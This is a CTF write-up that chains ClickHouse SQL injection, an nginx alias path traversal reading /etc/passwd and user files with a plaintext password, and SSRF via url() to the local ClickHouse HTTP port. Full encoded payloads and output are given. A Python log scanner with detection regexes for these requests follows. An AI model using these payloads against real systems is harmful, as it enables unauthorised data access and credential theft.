easy sqli
http://39.105.175.150:30001/?id=1
http://39.105.116.246:30001/?id=1
http://39.105.189.250:30001/?id=1
Opening the challenge, the address bar has an id parameter. Testing it for injection produces an error message:
http://39.105.189.250:30001/?id=1'
Code: 62. DB::Exception: Syntax error: failed at position 36 ('' '): ' . Single quoted string is not closed: '' '. Stack trace: 0. DB::parseQueryAndMovePosition(DB::IParser&, char const*&, char const*, std::__1::basic_string, std::__1::allocator > const&, bool, unsigned long, unsigned long) @ 0x1184fcb6 in /usr/bin/clickhouse 1. ? @ 0xf12c0ae in /usr/bin/clickhouse 2. DB::executeQuery(std::__1::basic_string, std::__1::allocator > const&, DB::Context&, bool, DB::QueryProcessingStage::Enum, bool) @ 0xf12bce3 in /usr/bin/clickhouse 3. DB::TCPHandler::runImpl() @ 0xf8b7c5d in /usr/bin/clickhouse 4. DB::TCPHandler::run() @ 0xf8ca1c9 in /usr/bin/clickhouse 5. Poco::Net::TCPServerConnection::start() @ 0x11f7ccbf in /usr/bin/clickhouse 6. Poco::Net::TCPServerDispatcher::run() @ 0x11f7e6d1 in /usr/bin/clickhouse 7. Poco::PooledThread::run() @ 0x120b4df9 in /usr/bin/clickhouse 8. Poco::ThreadImpl::runnableEntry(void*) @ 0x120b0c5a in /usr/bin/clickhouse 9. start_thread @ 0x7fa3 in /lib/x86_64-linux-gnu/libpthread-2.28.so 10. clone @ 0xf94cf in /lib/x86_64-linux-gnu/libc-2.28.so
A quick search shows the backend is the ClickHouse database management system:
https://clickhouse.com/docs/zh/
I had never used this database before, so there were quite a few blind spots.
Union query: union all. Built-in system tables: system.tables, with the columns database (String), the name of the database the table belongs to, and name (String), the table name; and system.databases.
There are two databases, ctf and default. ctf contains hint.
id=1%20union%20all%20select%20*%20from%20ctf.hint
Welcome to ByteCTF',), ('you_dont_have_permissions_to_read_flag
When id=2, an image is displayed:
http://39.105.189.250:30001/files/test.jpg
Directory traversal caused by an nginx misconfiguration:
http://39.105.189.250:30001/files../etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin nginx:x:101:102:nginx user,,,:/nonexistent:/bin/false clickhouse:x:999:999::/nonexistent:/bin/false
users.list shows two users, user_028643c754-c3e5-cbb5-4205-fb5ed51d8493 and user_01a84520c1-5143-ecd4-91ac-ec52b34bac85.
# a84520c1-5143-ecd4-91ac-ec52b34bac85.sql
ATTACH USER user_01 IDENTIFIED WITH plaintext_password BY 'e3b0c44298fc1c149afb';
ATTACH GRANT SELECT ON ctf.* TO user_01;
You can see that user_01 has high privileges.
The key point here is that ClickHouse has a url table function, and queries can also be issued through the HTTP interface:
https://clickhouse.com/docs/zh/interfaces/http/
https://clickhouse.com/docs/zh/sql-reference/table-functions/url/
Using SSRF to reach the HTTP interface, run queries with the user account and password obtained above:
1 union all select * from url("http://localhost:8123/?user=user_01&password=e3b0c44298fc1c149afb&query=select+name+from+system.tables",CSV,'column String') => 1+union+all+select+%2A+from+url%28%22http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.tables%22%2CCSV%2C%27column+String%27%29
1 union all select * from url("http://localhost:8123/?user=user_01&password=e3b0c44298fc1c149afb&query=select+*+from+ctf.flag",CSV,'column String') => 1+union+all+select+%2A+from+url%28%22http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2B%2A%2Bfrom%2Bctf.flag%22%2CCSV%2C%27column+String%27%29
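As an added defender-side example (not part of the original writeup), here is a small Python checker that scans nginx access-log lines for the request shapes this chain leaves behind: the single-quote probe, UNION ALL, the /files.. alias off-by-slash traversal, and a url() call aimed at the local ClickHouse HTTP port. The log lines, IP and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed nginx "combined" log lines (not from the original page), modelled
# on the request shapes in the writeup: quote probe, UNION ALL on ctf.hint,
# the /files.. alias traversal, and url() pointed at the local ClickHouse port.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:12:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.5 - - [10/Oct/2021:12:00:02 +0000] "GET /?id=1%27 HTTP/1.1" 500 2048 "-" "curl/7.68.0"
10.0.0.5 - - [10/Oct/2021:12:00:03 +0000] "GET /?id=1%20union%20all%20select%20*%20from%20ctf.hint HTTP/1.1" 200 128 "-" "curl/7.68.0"
10.0.0.5 - - [10/Oct/2021:12:00:04 +0000] "GET /files../etc/passwd HTTP/1.1" 200 1342 "-" "curl/7.68.0"
10.0.0.5 - - [10/Oct/2021:12:00:05 +0000] "GET /?id=1+union+all+select+%2A+from+url%28%22http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Du%26query%3Dselect%2Bname%2Bfrom%2Bsystem.tables%22%2CCSV%2C%27c+String%27%29 HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.5 - - [10/Oct/2021:12:00:06 +0000] "GET /files/test.jpg HTTP/1.1" 200 9000 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A segment ending in ".." (e.g. "/files../") is the nginx alias off-by-slash
# traversal; the same pattern also catches a plain "/../".
TRAVERSAL_RE = re.compile(r"(^|/)[^/]*\.\.(/|$)")
# Query-parameter rules for the ClickHouse-specific injection chain.
SQLI_RULES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("clickhouse_system_table", re.compile(r"\bsystem\.(tables|databases|users)\b", re.I)),
    ("clickhouse_url_function", re.compile(r"\burl\s*\(\s*['\"]https?://", re.I)),
    ("loopback_target", re.compile(r"https?://(localhost|127\.0\.0\.1)", re.I)),
]

def analyze(line):
    """Return {'ip', 'target', 'status', 'tags'} for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    tags = set()
    if TRAVERSAL_RE.search(unquote(parsed.path)):
        tags.add("path_traversal")
    # parse_qs splits on raw '&' before decoding, so an encoded '%26' inside a
    # url() argument stays part of the id value, exactly as the server sees it.
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        for value in values:
            if value.count("'") % 2 == 1:        # the 1' error-based probe
                tags.add("unbalanced_quote")
            tags.update(tag for tag, rx in SQLI_RULES if rx.search(value))
    return {"ip": m.group("ip"), "target": m.group("target"),
            "status": int(m.group("status")), "tags": sorted(tags)}

def scan(log_text):
    """Return only the parsed lines that triggered at least one tag."""
    results = (analyze(line) for line in log_text.splitlines())
    return [r for r in results if r and r["tags"]]
```

A 500 paired with an unbalanced quote is the error-based probe succeeding, and a 200 on a path_traversal hit means the alias misconfiguration actually served the file, so both deserve a higher alert weight than the tag alone.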